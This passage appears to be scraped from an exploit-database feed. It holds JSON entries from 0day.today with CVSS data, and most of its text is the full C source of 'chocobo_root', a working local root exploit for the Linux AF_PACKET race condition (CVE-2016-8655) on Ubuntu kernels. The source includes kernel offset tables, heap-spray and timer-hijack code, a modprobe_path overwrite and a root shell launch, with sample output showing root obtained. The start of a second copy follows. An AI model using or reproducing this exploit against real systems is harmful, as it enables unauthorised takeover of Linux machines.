executable_path\r\n rm_f payload_path\r\n end\r\nend\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/30429"}, {"lastseen": "2018-04-09T16:54:48", "edition": 1, "description": "Linux AF_PACKET race condition exploit for Ubuntu 16.04 x86_64.", "published": "2016-12-07T00:00:00", "title": "Linux Kernel 4.4.0 AF_PACKET Race Condition / Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2016-12-07T00:00:00", "href": "https://0day.today/exploit/description/26493", "id": "1337DAY-ID-26493", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit\r\nexploit for Ubuntu 16.04 x86_64\r\n \r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n[email\u00a0protected]:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n[email\u00a0protected]:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\n[email\u00a0protected]:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\n[email\u00a0protected]:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n \r\n \r\nstage 1 completed\r\nregistering new sysctl..\r\n \r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n \r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n \r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\n[email\u00a0protected]:~# id\r\nuid=0(root) gid=0(root) groups=0(root),1000(user)\r\n \r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n \r\nThere are offsets included for older kernels, but they're untested\r\nso be aware that this exploit will probably crash kernels older than 4.4.\r\n \r\ntested on:\r\nUbuntu 16.04: 4.4.0-51-generic\r\nUbuntu 16.04: 4.4.0-47-generic\r\nUbuntu 16.04: 4.4.0-36-generic\r\nUbuntu 14.04: 4.4.0-47-generic #68~14.04.1-Ubuntu\r\n \r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n \r\n11/2016\r\nby rebel\r\n*/\r\n \r\n#define _GNU_SOURCE\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <assert.h>\r\n#include <errno.h>\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include 
<sys/types.h>\r\n#include <sys/socket.h>\r\n#include <arpa/inet.h>\r\n#include <netinet/if_ether.h>\r\n#include <sys/mman.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <linux/if_packet.h>\r\n#include <pthread.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <sys/syscall.h>\r\n#include <signal.h>\r\n#include <sched.h>\r\n#include <sys/utsname.h>\r\n \r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n \r\nstruct offset {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n \r\n \r\nstruct offset *off = NULL;\r\n \r\n//99% of these offsets haven't actually been tested :)\r\n \r\nstruct offset offsets[] = {\r\n {\"4.4.0-46-generic #67~14.04.1\",0xffffffff810842f0,0xffffffff81e4b100,0xffffffff81274580,0xffffffff8106b880},\r\n {\"4.4.0-47-generic #68~14.04.1\",0,0,0,0},\r\n {\"4.2.0-41-generic #48\",0xffffffff81083470,0xffffffff81e48920,0xffffffff812775c0,0xffffffff8106c680},\r\n {\"4.8.0-22-generic #24\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b34b0,0xffffffff8106f0d0},\r\n {\"4.2.0-34-generic #39\",0xffffffff81082080,0xffffffff81c487e0,0xffffffff81274490,0xffffffff8106b5d0},\r\n {\"4.2.0-30-generic #36\",0xffffffff810820d0,0xffffffff81c487e0,0xffffffff812744e0,0xffffffff8106b620},\r\n {\"4.2.0-16-generic #19\",0xffffffff81081ac0,0xffffffff81c48680,0xffffffff812738f0,0xffffffff8106b110},\r\n {\"4.2.0-17-generic #21\",0,0,0,0},\r\n {\"4.2.0-18-generic #22\",0,0,0,0},\r\n {\"4.2.0-19-generic #23~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125de30,0xffffffff81067750},\r\n {\"4.2.0-21-generic #25~14.04.1\",0,0,0,0},\r\n {\"4.2.0-30-generic #36~14.04.1\",0xffffffff8107da40,0xffffffff81c4a8e0,0xffffffff8125dd40,0xffffffff81067b20},\r\n {\"4.2.0-27-generic #32~14.04.1\",0xffffffff8107dbe0,0xffffffff81c498c0,0xffffffff8125e420,0xffffffff81067c60},\r\n 
{\"4.2.0-36-generic #42\",0xffffffff81083430,0xffffffff81e488e0,0xffffffff81277380,0xffffffff8106c680},\r\n {\"4.4.0-22-generic #40\",0xffffffff81087d40,0xffffffff81e48f00,0xffffffff812864d0,0xffffffff8106f370},\r\n {\"4.2.0-18-generic #22~14.04.1\",0xffffffff8107d620,0xffffffff81c49780,0xffffffff8125dd10,0xffffffff81067760},\r\n {\"4.4.0-34-generic #53\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286ed0,0xffffffff8106f370},\r\n {\"4.2.0-22-generic #27\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273b20,0xffffffff8106b100},\r\n {\"4.2.0-23-generic #28\",0,0,0,0},\r\n {\"4.2.0-25-generic #30\",0,0,0,0},\r\n {\"4.4.0-36-generic #55\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e50,0xffffffff8106f360},\r\n {\"4.2.0-42-generic #49\",0xffffffff81083490,0xffffffff81e489a0,0xffffffff81277870,0xffffffff8106c680},\r\n {\"4.4.0-31-generic #50\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286e90,0xffffffff8106f370},\r\n {\"4.4.0-22-generic #40~14.04.1\",0xffffffff81084250,0xffffffff81c4b080,0xffffffff81273de0,0xffffffff8106b9d0},\r\n {\"4.2.0-38-generic #45\",0xffffffff810833d0,0xffffffff81e488e0,0xffffffff81277410,0xffffffff8106c680},\r\n {\"4.4.0-45-generic #66\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874c0,0xffffffff8106f320},\r\n {\"4.2.0-36-generic #42~14.04.1\",0xffffffff8107ffd0,0xffffffff81c499e0,0xffffffff81261ea0,0xffffffff81069d00},\r\n {\"4.4.0-45-generic #66~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274340,0xffffffff8106b880},\r\n {\"4.2.0-22-generic #27~14.04.1\",0xffffffff8107d640,0xffffffff81c497c0,0xffffffff8125deb0,0xffffffff81067750},\r\n {\"4.2.0-25-generic #30~14.04.1\",0,0,0,0},\r\n {\"4.2.0-23-generic #28~14.04.1\",0,0,0,0},\r\n {\"4.4.0-46-generic #67\",0xffffffff81088040,0xffffffff81e48f80,0xffffffff81287800,0xffffffff8106f320},\r\n {\"4.4.0-47-generic #68\",0,0,0,0},\r\n {\"4.4.0-34-generic #53~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c40,0xffffffff8106b880},\r\n 
{\"4.4.0-36-generic #55~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c60,0xffffffff8106b890},\r\n {\"4.4.0-31-generic #50~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273c20,0xffffffff8106b880},\r\n {\"4.2.0-38-generic #45~14.04.1\",0xffffffff8107fdc0,0xffffffff81c4a9e0,0xffffffff81261540,0xffffffff81069bf0},\r\n {\"4.2.0-35-generic #40\",0xffffffff81083430,0xffffffff81e48860,0xffffffff81277240,0xffffffff8106c680},\r\n {\"4.4.0-24-generic #43~14.04.1\",0xffffffff81084120,0xffffffff81c4b080,0xffffffff812736f0,0xffffffff8106b880},\r\n {\"4.4.0-21-generic #37\",0xffffffff81087cf0,0xffffffff81e48e80,0xffffffff81286310,0xffffffff8106f370},\r\n {\"4.2.0-34-generic #39~14.04.1\",0xffffffff8107dc50,0xffffffff81c498e0,0xffffffff8125e830,0xffffffff81067c90},\r\n {\"4.4.0-24-generic #43\",0xffffffff81087e60,0xffffffff81e48f00,0xffffffff812868f0,0xffffffff8106f370},\r\n {\"4.4.0-21-generic #37~14.04.1\",0xffffffff81084220,0xffffffff81c4b000,0xffffffff81273a30,0xffffffff8106b9d0},\r\n {\"4.2.0-41-generic #48~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aa20,0xffffffff812616c0,0xffffffff81069bf0},\r\n {\"4.8.0-27-generic #29\",0xffffffff8108ab70,0xffffffff81e47880,0xffffffff812b3490,0xffffffff8106f0d0},\r\n {\"4.8.0-26-generic #28\",0,0,0,0},\r\n {\"4.4.0-38-generic #57\",0xffffffff81087f70,0xffffffff81e48f80,0xffffffff81287470,0xffffffff8106f360},\r\n {\"4.4.0-42-generic #62~14.04.1\",0xffffffff81084260,0xffffffff81e4b100,0xffffffff81274300,0xffffffff8106b880},\r\n {\"4.4.0-38-generic #57~14.04.1\",0xffffffff81084210,0xffffffff81e4b100,0xffffffff812742e0,0xffffffff8106b890},\r\n {\"4.4.0-49-generic #70\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff81287d40,0xffffffff8106f320},\r\n {\"4.4.0-49-generic #70~14.04.1\",0xffffffff81084350,0xffffffff81e4b100,0xffffffff81274b10,0xffffffff8106b880},\r\n {\"4.2.0-21-generic #25\",0xffffffff81081ad0,0xffffffff81c486c0,0xffffffff81273aa0,0xffffffff8106b100},\r\n {\"4.2.0-19-generic #23\",0,0,0,0},\r\n 
{\"4.2.0-42-generic #49~14.04.1\",0xffffffff8107fe20,0xffffffff81c4aaa0,0xffffffff81261980,0xffffffff81069bf0},\r\n {\"4.4.0-43-generic #63\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874b0,0xffffffff8106f320},\r\n {\"4.4.0-28-generic #47\",0xffffffff81087ea0,0xffffffff81e48f80,0xffffffff81286df0,0xffffffff8106f370},\r\n {\"4.4.0-28-generic #47~14.04.1\",0xffffffff81084160,0xffffffff81c4b100,0xffffffff81273b70,0xffffffff8106b880},\r\n {\"4.9.0-1-generic #2\",0xffffffff8108bbe0,0xffffffff81e4ac20,0xffffffff812b8400,0xffffffff8106f390},\r\n {\"4.8.0-28-generic #30\",0xffffffff8108ae10,0xffffffff81e48b80,0xffffffff812b3690,0xffffffff8106f0e0},\r\n {\"4.2.0-35-generic #40~14.04.1\",0xffffffff8107fff0,0xffffffff81c49960,0xffffffff81262320,0xffffffff81069d20},\r\n {\"4.2.0-27-generic #32\",0xffffffff810820c0,0xffffffff81c487c0,0xffffffff81274150,0xffffffff8106b620},\r\n {\"4.4.0-42-generic #62\",0xffffffff81087fc0,0xffffffff81e48f80,0xffffffff812874a0,0xffffffff8106f320},\r\n {\"4.4.0-51-generic #72\",0xffffffff81088090,0xffffffff81e48f80,0xffffffff812879a0,0xffffffff8106f320},\r\n//{\"4.8.6-300.fc25.x86_64 #1 SMP Tue Nov 1 12:36:38 UTC 2016\",0xffffffff9f0a8b30,0xffffffff9fe40940,0xffffffff9f2cfbf0,0xffffffff9f0663b0},\r\n {NULL,0,0,0,0}\r\n};\r\n \r\n#define VSYSCALL 0xffffffffff600000\r\n \r\n#define PAD 64\r\n \r\nint pad_fds[PAD];\r\n \r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n \r\n#define CONF_RING_FRAMES 1\r\n \r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n \r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n \r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while(barrier) {\r\n }\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, 
(void*) &tp, sizeof(tp));\r\n \r\n return NULL;\r\n}\r\n \r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n \r\n while(barrier) {}\r\n \r\n while(1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n y++;\r\n \r\n if(x != 0) break;\r\n \r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n if(x != 0) break;\r\n \r\n y++;\r\n }\r\n \r\n fprintf(stderr,\"version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n \r\n \r\n return NULL;\r\n}\r\n \r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n \r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\",\"wtf\",exploitbuf,BUFSIZE-24,-2);\r\n}\r\n \r\n \r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n \r\n for(x=0; x<PAD; x++)\r\n if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {\r\n fprintf(stderr,\"pad_kmalloc() socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n}\r\n \r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n \r\n sigemptyset(&set);\r\n \r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n fprintf(stderr,\"new exploit attempt starting, jumping to %p, arg=%p\\n\",(void *)func,(void *)arg);\r\n \r\n pad_kmalloc();\r\n \r\n fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));\r\n \r\n if (fd==-1) {\r\n printf(\"target socket error\\n\");\r\n exit(1);\r\n }\r\n \r\n pad_kmalloc();\r\n \r\n fprintf(stderr,\"sockets allocated\\n\");\r\n \r\n val = TPACKET_V3;\r\n \r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n \r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n 
tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n \r\n//try to set the timeout to 10 seconds\r\n//the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n \r\n sfd = fd;\r\n \r\n if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n fprintf(stderr, \"Error creating thread\\n\");\r\n return 1;\r\n }\r\n \r\n \r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n \r\n usleep(200000);\r\n \r\n fprintf(stderr,\"removing barrier and spraying..\\n\");\r\n \r\n memset(exploitbuf,'\\x00',BUFSIZE);\r\n \r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n \r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n \r\n \r\n barrier = 0;\r\n \r\n usleep(100000);\r\n \r\n while(!vers_switcher_done)usleep(100000);\r\n \r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n \r\n fprintf(stderr,\"current packet version = %d\\n\",val);\r\n \r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n \r\n \r\n if(pbd == MAP_FAILED) {\r\n fprintf(stderr,\"could not map pbd\\n\");\r\n exit(1);\r\n }\r\n \r\n else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n fprintf(stderr,\"pbd->hdr.bh1.offset_to_first_pkt = %d\\n\",off);\r\n }\r\n \r\n \r\n if(val == TPACKET_V1 && off != 0) {\r\n fprintf(stderr,\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n }\r\n \r\n else {\r\n fprintf(stderr,\"race not won\\n\");\r\n exit(2);\r\n }\r\n \r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n \r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n \r\n fprintf(stderr,\"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. 
so don't do that.\\n\");\r\n sleep(1);\r\n fprintf(stderr,\"closing socket and verifying..\");\r\n \r\n close(sfd);\r\n \r\n kmalloc();\r\n \r\n fprintf(stderr,\"all messages sent\\n\");\r\n \r\n sleep(31337);\r\n exit(1);\r\n}\r\n \r\n \r\nint verification_result = 0;\r\n \r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n \r\n \r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n \r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n \r\n if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n fprintf(stderr,\"couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n \r\n signal(SIGSEGV, catch_sigsegv);\r\n \r\n *vsyscall = 0xdeadbeef+x;\r\n \r\n if(*vsyscall == 0xdeadbeef+x) {\r\n fprintf(stderr,\"\\nvsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n \r\n return NULL;\r\n}\r\n \r\nvoid verify_stage1(void)\r\n{\r\n int x;\r\n pthread_t v_thread;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n \r\n pthread_join(v_thread, NULL);\r\n \r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not modify vsyscall\\n\");\r\n \r\n exit(1);\r\n}\r\n \r\nvoid verify_stage2(void)\r\n{\r\n int x;\r\n struct stat b;\r\n \r\n sleep(5);\r\n \r\n for(x=0; x<300; x++) {\r\n \r\n if(stat(\"/proc/sys/hack\",&b) == 0) {\r\n fprintf(stderr,\"\\nsysctl added!\\n\");\r\n exit(0);\r\n }\r\n \r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n \r\n printf(\"could not add sysctl\\n\");\r\n exit(1);\r\n \r\n \r\n}\r\n \r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n \r\nretry:\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n 
\r\n wait(&status);\r\n \r\n printf(\"\\n\");\r\n \r\n if(WEXITSTATUS(status) == 2) {\r\n printf(\"retrying stage..\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n \r\n else if(WEXITSTATUS(status) != 0) {\r\n printf(\"something bad happened, aborting exploit attempt\\n\");\r\n exit(-1);\r\n }\r\n \r\n \r\n \r\n kill(pid, 9);\r\n}\r\n \r\n \r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n \r\n fprintf(stderr,\"exploit starting\\n\");\r\n printf(\"making vsyscall page writable..\\n\\n\");\r\n \r\n exploit(off->set_memory_rw, VSYSCALL, verify_stage1);\r\n \r\n printf(\"\\nstage 1 completed\\n\");\r\n \r\n sleep(5);\r\n \r\n printf(\"registering new sysctl..\\n\\n\");\r\n \r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n \r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n \r\n strcpy((char *)(VSYSCALL+0xf00),\"hack\");\r\n memcpy((char *)(VSYSCALL+0xe00),\"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(off->proc_dostring);\r\n c->data = (void *)(off->modprobe_path);\r\n c->maxlen=256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n \r\n exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);\r\n \r\n printf(\"stage 2 completed\\n\");\r\n}\r\n \r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n \r\n \r\n fd = open(\"/proc/sys/hack\",O_WRONLY);\r\n \r\n if(fd == -1) {\r\n fprintf(stderr,\"could not open /proc/sys/hack\\n\");\r\n exit(-1);\r\n }\r\n \r\n memset(buf,'\\x00', 256);\r\n \r\n readlink(\"/proc/self/exe\",(char *)&buf,256);\r\n \r\n write(fd,buf,strlen(buf)+1);\r\n \r\n socket(AF_INET,SOCK_STREAM,132);\r\n \r\n if(stat(buf,&s) == 0 && s.st_uid == 0) {\r\n printf(\"binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd,\"/sbin/modprobe\",15);\r\n close(fd);\r\n execl(buf,buf,NULL);\r\n }\r\n \r\n else\r\n printf(\"could not 
create rootshell\\n\");\r\n \r\n \r\n}\r\n \r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n int i, crash = 0;\r\n char buf[512], *f;\r\n \r\n \r\n if(argc == 2 && !strcmp(argv[1],\"crash\")) {\r\n crash = 1;\r\n }\r\n \r\n \r\n if(getuid() == 0 && geteuid() == 0 && !crash) {\r\n chown(\"/proc/self/exe\",0,0);\r\n chmod(\"/proc/self/exe\",06755);\r\n exit(-1);\r\n }\r\n \r\n else if(getuid() != 0 && geteuid() == 0 && !crash) {\r\n setresuid(0,0,0);\r\n setresgid(0,0,0);\r\n execl(\"/bin/bash\",\"bash\",\"-p\",NULL);\r\n exit(0);\r\n }\r\n \r\n fprintf(stderr,\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n \r\n uname(&u);\r\n \r\n if((f = strstr(u.version,\"-Ubuntu\")) != NULL) *f = '\\0';\r\n \r\n snprintf(buf,512,\"%s %s\",u.release,u.version);\r\n \r\n printf(\"kernel version: %s\\n\",buf);\r\n \r\n \r\n for(i=0; offsets[i].kernel_version != NULL; i++) {\r\n if(!strcmp(offsets[i].kernel_version,buf)) {\r\n \r\n while(offsets[i].proc_dostring == 0)\r\n i--;\r\n \r\n off = &offsets[i];\r\n break;\r\n }\r\n }\r\n \r\n if(crash) {\r\n off = &offsets[0];\r\n off->set_memory_rw = 0xffffffff41414141;\r\n }\r\n \r\n if(off) {\r\n printf(\"proc_dostring = %p\\n\",(void *)off->proc_dostring);\r\n printf(\"modprobe_path = %p\\n\",(void *)off->modprobe_path);\r\n printf(\"register_sysctl_table = %p\\n\",(void *)off->register_sysctl_table);\r\n printf(\"set_memory_rw = %p\\n\",(void *)off->set_memory_rw);\r\n }\r\n \r\n if(!off) {\r\n fprintf(stderr,\"i have no offsets for this kernel version..\\n\");\r\n exit(-1);\r\n }\r\n \r\n pid = fork();\r\n \r\n if(pid == 0) {\r\n if(unshare(CLONE_NEWUSER) != 0)\r\n fprintf(stderr, \"failed to create new user namespace\\n\");\r\n \r\n if(unshare(CLONE_NEWNET) != 0)\r\n fprintf(stderr, \"failed to create new network namespace\\n\");\r\n \r\n wrapper();\r\n exit(0);\r\n }\r\n \r\n waitpid(pid, &status, 0);\r\n \r\n launch_rootshell();\r\n return 0;\r\n}\n\n# 0day.today [2018-04-09] #", 
"sourceHref": "https://0day.today/exploit/26493", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-04T23:55:49", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2019-07-26T00:00:00", "title": "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) AF_PACKET Race Condition Privilege", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2019-07-26T00:00:00", "id": "1337DAY-ID-33037", "href": "https://0day.today/exploit/description/33037", "sourceData": "/*\r\nchocobo_root.c\r\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\r\nIncludes KASLR and SMEP/SMAP bypasses.\r\nFor Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.\r\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\r\n\r\nvroom vroom\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n[email\u00a0protected]:~$ uname -a\r\nLinux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux\r\n[email\u00a0protected]:~$ id\r\nuid=1000(user) gid=1000(user) groups=1000(user)\r\n[email\u00a0protected]:~$ gcc chocobo_root.c -o chocobo_root -lpthread\r\n[email\u00a0protected]:~$ ./chocobo_root\r\nlinux AF_PACKET race condition exploit by rebel\r\nkernel version: 4.4.0-51-generic #72\r\nproc_dostring = 0xffffffff81088090\r\nmodprobe_path = 0xffffffff81e48f80\r\nregister_sysctl_table = 0xffffffff812879a0\r\nset_memory_rw = 0xffffffff8106f320\r\nexploit starting\r\nmaking vsyscall page writable..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 174222, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes 
for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nvsyscall page altered!\r\n\r\n\r\nstage 1 completed\r\nregistering new sysctl..\r\n\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 30773, last val = 0)\r\ncurrent packet version = 2\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\nrace not won\r\n\r\nretrying stage..\r\nnew exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850\r\nsockets allocated\r\nremoving barrier and spraying..\r\nversion switcher stopping, x = -1 (y = 133577, last val = 2)\r\ncurrent packet version = 0\r\npbd->hdr.bh1.offset_to_first_pkt = 48\r\n*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\r\nplease wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\r\nclosing socket and verifying.......\r\nsysctl added!\r\n\r\nstage 2 completed\r\nbinary executed by kernel, launching rootshell\r\n[email\u00a0protected]:~# id\r\nuid=0(root) gid=0(root) 